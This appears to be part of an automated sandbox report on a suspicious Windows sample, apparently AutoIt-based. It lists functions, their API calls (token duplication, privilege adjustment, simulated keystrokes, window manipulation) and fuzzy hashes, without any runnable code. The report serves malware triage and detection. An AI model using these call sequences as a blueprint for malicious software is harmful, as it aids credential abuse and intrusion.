                                        • Part of subcall function 008ECC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,008ECD19,?,?,?,?,008CEE51,00943630,00000002), ref: 008ECC6E
                                        • Part of subcall function 008ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,008ECD19,?,?,?,?,008CEE51,00943630,00000002), ref: 008ECC7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$Pointer$Write
                                      • String ID:
                                      • API String ID: 3847668363-0
                                      • Opcode ID: 725aa1ccfce5eb914149c50450f4e97e6b590888a8634a09a12f5488e7bb4ac8
                                      • Instruction ID: 40112e7f5647440d91dff9b30e85fb03bf7da14be901d710968a12c460671922
                                      • Opcode Fuzzy Hash: 725aa1ccfce5eb914149c50450f4e97e6b590888a8634a09a12f5488e7bb4ac8
                                      • Instruction Fuzzy Hash: F3E06D7A900704FFC7219F8ADD008AABBF8FF85360710852FE996C2110D3B1AA55EB60
                                      Function 00882DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00882DC4
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongNamePath_wcslen
                                      • String ID:
                                      • API String ID: 541455249-0
                                      • Opcode ID: 805add349509dc20cb49f5cc8ba100ea56579949284e2e4cca57b19d2c1771c8
                                      • Instruction ID: 9f6b8347e89106f9ff90c0e2f3fa0e5aaab76241a0e42043a99dc0a5732c2305
                                      • Opcode Fuzzy Hash: 805add349509dc20cb49f5cc8ba100ea56579949284e2e4cca57b19d2c1771c8
                                      • Instruction Fuzzy Hash: DFE0CD726042245BCB10A25C9C09FDA77EDEFC8790F044075FD09D7248D970ED80C651
                                      Function 00882B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00883837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00883908
                                        • Part of subcall function 0088D730: GetInputState.USER32 ref: 0088D807
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00882B6B
                                        • Part of subcall function 008830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0088314E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                      • String ID:
                                      • API String ID: 3667716007-0
                                      • Opcode ID: d4fdb8e609c071de84f50e140e3bde13bf4f061bedeec12b02ba892560440e38
                                      • Instruction ID: 5dc35d25c066eb68223553724769aa995477cdf1299ebf6b677f627b112abd4e
                                      • Opcode Fuzzy Hash: d4fdb8e609c071de84f50e140e3bde13bf4f061bedeec12b02ba892560440e38
                                      • Instruction Fuzzy Hash: 7AE0862130434506CA14BB7DA8525BDA759FBD5756F40153EF542C71B2CE2449498353
                                      Function 01392AD8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?), ref: 01392AE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                      • Instruction ID: 4f99e215684ec3bbd5c8de3f3114d587df824b29a049ca6ca265a1584f7965fa
                                      • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                      • Instruction Fuzzy Hash: 89E08C7194960CFBDF25CEAC8908AAE77E8EB05324F004654E906C3280D5348A04D750
                                      Function 01392AA8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?), ref: 01392AB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                      • Instruction ID: 030e09c3bbb7faeb8d94928282f9f735fb6192d0b1caab48f5560d16719f35c0
                                      • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                      • Instruction Fuzzy Hash: 43D05E3190520CABDB20CAA8990499A73A8A705324F004754E91583280D9359A0097A0
                                      Function 008C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,00000000,?,008C0704,?,?,00000000,?,008C0704,00000000,0000000C), ref: 008C03B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 413ce17e41e44b1fdd09f51b6e222c3adefe40586b4ad42ec04dbf39da488367
                                      • Instruction ID: bd8407aa23ac3f9d43dac8fa90a6169907ed27c0570030836ca15ac616f99a1b
                                      • Opcode Fuzzy Hash: 413ce17e41e44b1fdd09f51b6e222c3adefe40586b4ad42ec04dbf39da488367
                                      • Instruction Fuzzy Hash: 13D06C3219410DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C732E821EB90
                                      Function 00881CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00881CBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem
                                      • String ID:
                                      • API String ID: 3098949447-0
                                      • Opcode ID: 0b0f9253642ed4f1d228144fbe124180923c7064a01b439bdd8fd22015bcdf62
                                      • Instruction ID: d23b72e2465eece397870ca7cfc25e436473e11f75da6cbc0642f1d13edcca0b
                                      • Opcode Fuzzy Hash: 0b0f9253642ed4f1d228144fbe124180923c7064a01b439bdd8fd22015bcdf62
                                      • Instruction Fuzzy Hash: 41C092363EC304AFF3158B81BC5AF507765A348B02F048401F609A96F3D3B22820FB50
                                      Function 008F744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00885745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 00885773
                                      • GetLastError.KERNEL32(00000002,00000000), ref: 008F76DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateErrorFileLast
                                      • String ID:
                                      • API String ID: 1214770103-0
                                      • Opcode ID: a0c354539c51f1a04844be40deb8c00564fe3ba91bce2e077f047734adcff678
                                      • Instruction ID: 5591ca9775e34f8150fb1c720cbcdf630a701b340011800b7f977d7a00847a37
                                      • Opcode Fuzzy Hash: a0c354539c51f1a04844be40deb8c00564fe3ba91bce2e077f047734adcff678
                                      • Instruction Fuzzy Hash: 2681AA302087059FDB14FF28C491A6AB7E1FF99314F08452DF996DB2A2DB34AD45CB92
                                      Function 013944C4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 013944D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 19db188f2e75fbf808ee954949a7d15ef61f7d5415f2c7028efe75a2de840dfc
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: C8E0BF7494020EEFDB10DFA4D6496ED7BB4EF04301F1045A1FD05E7681DB309E548A62
                                      Function 00886246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNELBASE(?,?,00000000,008C24E0), ref: 00886266
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: b061da1430b1db9b2c4584b6566d1163cdac4b3ce11a21073fb76b201c1fbb8f
                                      • Instruction ID: 73a868243a15d9692746f75b9e1b678bdce7405aaf1608e8e50d041fc7d1bca2
                                      • Opcode Fuzzy Hash: b061da1430b1db9b2c4584b6566d1163cdac4b3ce11a21073fb76b201c1fbb8f
                                      • Instruction Fuzzy Hash: 6AE09275500B11CEC3715F1AE808452FBE5FEE13613208A6ED0E592660E3B058969B50
                                      Function 013944C8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 013944D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 8e9ef1b3c3f0c49e981fbbad9ced16a7153e023c13b4a7354bba936e18bf5945
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 86E0E67494020EDFDB00DFB4D6496AD7BB4EF04301F1041A1FD01E2281DA309D508A62

                                      Non-executed Functions

                                      Function 00919576 Relevance: 67.1, APIs: 36, Strings: 2, Instructions: 625windowkeyboardnativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0091961A
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0091965B
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0091969F
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009196C9
                                      • SendMessageW.USER32 ref: 009196F2
                                      • GetKeyState.USER32(00000011), ref: 0091978B
                                      • GetKeyState.USER32(00000009), ref: 00919798
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009197AE
                                      • GetKeyState.USER32(00000010), ref: 009197B8
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009197E9
                                      • SendMessageW.USER32 ref: 00919810
                                      • SendMessageW.USER32(?,00001030,?,00917E95), ref: 00919918
                                      • SetCapture.USER32(?), ref: 0091994A
                                      • ClientToScreen.USER32(?,?), ref: 009199AF
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009199D6
                                      • ReleaseCapture.USER32 ref: 009199E1
                                      • GetCursorPos.USER32(?), ref: 00919A19
                                      • ScreenToClient.USER32(?,?), ref: 00919A26
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00919A80
                                      • SendMessageW.USER32 ref: 00919AAE
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00919AEB
                                      • SendMessageW.USER32 ref: 00919B1A
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00919B3B
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00919B4A
                                      • GetCursorPos.USER32(?), ref: 00919B68
                                      • ScreenToClient.USER32(?,?), ref: 00919B75
                                      • GetParent.USER32(?), ref: 00919B93
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00919BFA
                                      • SendMessageW.USER32 ref: 00919C2B
                                      • ClientToScreen.USER32(?,?), ref: 00919C84
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00919CB4
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00919CDE
                                      • SendMessageW.USER32 ref: 00919D01
                                      • ClientToScreen.USER32(?,?), ref: 00919D4E
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00919D82
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00919E05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 1312020300-4164748364
                                      • Opcode ID: e94b1b29193678c28b7f5f9059b57d2ca33f2eccb37e620b5a1cfa6b391111a0
                                      • Instruction ID: 6af33ab8280cb012a7903e6ea95f4e9868d17a11f2b66a5de2a28b3c71ec8e9a
                                      • Opcode Fuzzy Hash: e94b1b29193678c28b7f5f9059b57d2ca33f2eccb37e620b5a1cfa6b391111a0
                                      • Instruction Fuzzy Hash: 6E429F74308205EFD724CF28CC64BEABBE9FF89354F144619F59A872A1D7319890DB51
                                      Function 00914873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009148F3
                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00914908
                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00914927
                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0091494B
                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0091495C
                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0091497B
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009149AE
                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009149D4
                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00914A0F
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00914A56
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00914A7E
                                      • IsMenu.USER32(?), ref: 00914A97
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00914AF2
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00914B20
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00914B94
                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00914BE3
                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00914C82
                                      • wsprintfW.USER32 ref: 00914CAE
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00914CC9
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00914CF1
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00914D13
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00914D33
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00914D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 4054740463-328681919
                                      • Opcode ID: 3902f64e95f62440d2765752c19e88b2d3e8fa798303407cfb0e173ccab6effa
                                      • Instruction ID: 68304dc62648aaca7ce1bff34a5e18e30226a069be42f61265d0c669b9a74230
                                      • Opcode Fuzzy Hash: 3902f64e95f62440d2765752c19e88b2d3e8fa798303407cfb0e173ccab6effa
                                      • Instruction Fuzzy Hash: 5C12FC71744218ABEB249F28CC49FEE7BB8EF49710F144129F516EB2E1DB789981CB50
                                      Function 0089F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0089F998
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008DF474
                                      • IsIconic.USER32(00000000), ref: 008DF47D
                                      • ShowWindow.USER32(00000000,00000009), ref: 008DF48A
                                      • SetForegroundWindow.USER32(00000000), ref: 008DF494
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008DF4AA
                                      • GetCurrentThreadId.KERNEL32 ref: 008DF4B1
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008DF4BD
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 008DF4CE
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 008DF4D6
                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 008DF4DE
                                      • SetForegroundWindow.USER32(00000000), ref: 008DF4E1
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF4F6
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF501
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF50B
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF510
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF519
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF51E
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF528
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF52D
                                      • SetForegroundWindow.USER32(00000000), ref: 008DF530
                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 008DF557
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: 6324c992390d0608fb4b0145d40ac11e64fd6afb2f29ada5a9c62d465e9cb73a
                                      • Instruction ID: a139dea47367c4b1fa3b12578531ccfd47f459f3b1bf2b29271ea92d6bdf4ada
                                      • Opcode Fuzzy Hash: 6324c992390d0608fb4b0145d40ac11e64fd6afb2f29ada5a9c62d465e9cb73a
                                      • Instruction Fuzzy Hash: 3E313EB1B94218BAEB216BB55C4AFBF7F6DFB44B50F104066FA01E61D1C6B15900FAA0
                                      Function 008E1201 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E170D
                                        • Part of subcall function 008E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E173A
                                        • Part of subcall function 008E16C3: GetLastError.KERNEL32 ref: 008E174A
                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 008E1286
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008E12A8
                                      • CloseHandle.KERNEL32(?), ref: 008E12B9
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008E12D1
                                      • GetProcessWindowStation.USER32 ref: 008E12EA
                                      • SetProcessWindowStation.USER32(00000000), ref: 008E12F4
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008E1310
